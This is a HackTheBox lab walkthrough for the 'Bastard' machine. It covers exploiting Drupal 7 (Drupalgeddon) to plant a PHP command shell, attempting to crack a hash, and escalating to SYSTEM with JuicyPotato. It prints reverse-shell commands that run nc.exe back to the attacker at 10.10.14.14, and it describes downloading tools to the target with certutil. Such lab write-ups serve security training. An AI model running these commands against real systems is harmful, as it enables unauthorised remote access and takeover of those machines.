Bastard- HackTheBox Writeup
The link for this machine is located here: https://app.hackthebox.com/machines/7
In this room, we discover a Drupal website running on the target that ends up being vulnerable to Drupalgeddon. From there, we gain a shell and escalate privileges using the famous Juicy Potato kernel exploit.
Full Walkthrough
First we can run an Nmap scan to identify which ones are open by using the following Nmap options:
-p- for all ports
10.10.10.9 for the target IP
-oN allports.scan to output to a file
This reveals 3 ports to us as open - 80, 135 and 49154. To gather more information about these services, we can perform a more detailed scan.
This gives us more information such as Microsoft IIS 7.5 running for the website. It also shows us that there is a robots.txt file with a ton of entries.
Knowing this, we can first check the main page of the website.
It just seems to be a login panel and a home page with no content as of yet.
Next, we can check out all the links inside the robots.txt (I’ll leave that to you) and eventually you will stumble upon the CHANGELOG.txt file which reveals to us the version of Drupal running on this machine.
Now that we know the version of the software running, we can try and research for any potential exploits that we could utilize.
Google reveals a ton of results. However, one that stood out to me initially was the Drupal 7.X RCE vulnerability. Let’s check it out in more detail.
This tells us that it has an unsecure use of unserialize() meaning we can potentially get Remote Code Execution from it.
Looking in further detail, we can find an Exploit-DB link for this exact vulnerability which provides us with PHP code.
Using this, we can download and take a look at this code locally. Going through the code, we see it defines some variables to start - one being the $endpoint_path.
However, we don’t know if this page exists yet. If we try to navigate to it in our browser, we get a page not found error so it’s likely this exploit will not work as of now.
It’s possible the developers on the back end changed the pathway for this endpoint - we can try and check this by using a directory busting tool like Feroxbuster with a wordlist like common.txt.
After a few minutes, we see an interesting pathway - /rest. This could be the renamed directory of the endpoint we need to exploit. We can try navigating to it.
It works! And it also tells us that the rest_endpoint has been setup successfully - now we know that the URL for it exists at /rest and that the endpoint is running itself.
With this information, we can modify the PHP code by changing the url, endpoint path and what PHP code gets executed to a CMD parameter that we can provide. We also change the filename to “complexity.php” just for fun.
Once completed, we can simply run it via PHP.
Unfortunately, this returns an error for an undefined function called curl_init(). Doing some research on this error, it seems we don’t have the package installed for PHP Curl.
To fix this, we can simply use apt install to install that package we need.
After installation, we can simply try running it again - this time it works!
It tells us that it stored both session and user information in two different JSON files. Looking at the session.json file reveals the following:
And we can also take a look at the user.json file to reveal user information.
At the very bottom, we see what looks like a password hash. We can take this hash and try and identify it online.
This tells us that it is possibly using the Drupal7 hashing algorithm which seems to fit what we already know. With this information, we can paste this hash into a file and attempt to crack it using Hashcat on our host machine:
Unfortunately, after about 5 minutes, it returns telling us that the rockyou.txt wordlist was exhausted meaning it did not find the cleartext password.
At this point, if we didn’t crack it with rockyou.txt (at least for HTB machines), it’s typically not the intended path/exploit. For now, we can put this hash in our back pocket and move on.
Going back to the exploit, we can try navigating to our PHP file now - complexity.php
This works but nothing is here - and rightfully so. In our code, we changed it so that we could send system commands as requests by using the cmd parameter:
In our URL, if we add the following - ?cmd= - we are able to execute system commands such as whoami.
With command execution, we can use Netcat to gain a reverse shell. First, we copy the nc.exe executable file to our current directory and host it using an SMB share called share.
Before we execute it, we need to start a Netcat listener on port 443.
Finally, we can simply execute the following in the URL parameter with URL encoding for the spaces:
cmd=\\10.10.14.14\share\nc.exe -e cmd.exe 10.10.14.14 443
After hitting Enter, we can check our Netcat listener and see we receive a shell back.
For privilege escalation, we can try running a script such as winPEAS. However, it needs to be noted that winPEAS does require .NET Framework 4.0 or later.
To check this, we can list out the contents of the C:\Windows\Microsoft.NET\Framework directory.
Unfortunately, for this box, .NET Framework 4.0 is not installed meaning winPEAS will not work. There are other automation scripts out there, but let’s try and do it manually.
First, we can systeminfo to gather information about this machine.
This tells us the OS, build and that the machine is 64-bit based. Since it is an old OS, there are likely privilege escalation vectors out there, but let’s hold off for now and perform some more manual enumeration.
For example, we can run the whoami /all command to get tons of information about our current user.
What’s interesting here is that we have the SeImpersonatePrivilege enabled for us. With this, we can use the JuicyPotato exploit:
First, we can download the executable listed in the released page. Then, we need to transfer it over to the target by hosting a Python server.
On the target machine, we can run the certutil command to download two files - JuicyPotato.exe and nc.exe.
For the JuicyPotato exploit, we need two main things. First, we need to find a CLSID for our operating system - in this case Windows Server 2008 R2.
We can try the first two to see if they work. Before execution, we need to start a Netcat listener once again on port 443.
Then, we execute the JuicyPotato.exe exploit and specify what we want it to do:
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a “/c C:\Temp\nc.exe -e cmd.exe 10.10.14.14 443” -t * -c {CLSDI-VALUE}
Where:
-l is the COM server listen port
-p is the program to launch
-a is the arguments to pass to the program
-t * creates the process (both)
-c specifies the CLSID
In short, we are basically telling it to execute Netcat and connect back to our attacker machine.
It tells us that it is OK. If we go back to our Netcat listener, we see a shell was popped as SYSTEM.
From here, to complete this box, we can grab the user.txt and root.txt flags for submission.